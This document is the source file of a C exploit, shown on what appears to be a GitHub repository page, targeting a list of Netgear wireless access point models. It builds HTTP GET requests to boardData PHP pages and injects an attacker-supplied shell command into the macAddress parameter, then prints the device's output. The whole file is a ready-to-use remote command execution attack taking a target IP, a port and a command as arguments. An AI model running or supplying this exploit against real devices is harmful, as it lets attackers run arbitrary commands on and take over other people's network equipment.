-
Notifications
You must be signed in to change notification settings - Fork 2
Expand file tree
/
Copy pathNetgear_Multi_RCE.c
More file actions
75 lines (59 loc) · 2.08 KB
/
Netgear_Multi_RCE.c
File metadata and controls
75 lines (59 loc) · 2.08 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
// "Netgear WG102, Netgear WG103, Netgear WN604, Netgear WNDAP350, Netgear WNDAP360, Netgear WNAP320, Netgear WNAP210, Netgear WNDAP660",
// "Netgear WNDAP620, Netgear WNDAP380R, Netgear WNDAP380R(v2), Netgear WN370 Netgear WND930"
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <arpa/inet.h>
#define BUFFER_SIZE 4096
#define RESOURCE_COUNT 5
const char *resources[RESOURCE_COUNT] = {
"boardData102.php",
"boardData103.php",
"boardDataNA.php",
"boardDataWW.php",
"boardDataJP.php"
};
void exploit(const char *target_ip, int port, const char *command) {
int sock;
struct sockaddr_in server_addr;
char buffer[BUFFER_SIZE];
char request[BUFFER_SIZE];
sock = socket(AF_INET, SOCK_STREAM, 0);
if (sock < 0) {
perror("Socket creation failed");
return;
}
server_addr.sin_family = AF_INET;
server_addr.sin_port = htons(port);
inet_pton(AF_INET, target_ip, &server_addr.sin_addr);
if (connect(sock, (struct sockaddr *)&server_addr, sizeof(server_addr)) < 0) {
perror("Connection failed");
close(sock);
return;
}
for (int i = 0; i < RESOURCE_COUNT; i++) {
snprintf(request, sizeof(request),
"GET /%s?writeData=true®info=0&macAddress=001122334455 -c 0 ;%s; echo # HTTP/1.1\r\n"
"Host: %s\r\n"
"Connection: close\r\n\r\n",
resources[i], command, target_ip);
send(sock, request, strlen(request), 0);
while (recv(sock, buffer, sizeof(buffer) - 1, 0) > 0) {
buffer[BUFFER_SIZE - 1] = '\0';
printf("%s", buffer);
}
}
close(sock);
}
int main(int argc, char *argv[]) {
if (argc != 4) {
fprintf(stderr, "Usage: %s <target_ip> <port> <command>\n", argv[0]);
return EXIT_FAILURE;
}
const char *target_ip = argv[1];
int port = atoi(argv[2]);
const char *command = argv[3];
exploit(target_ip, port, command);
return EXIT_SUCCESS;
}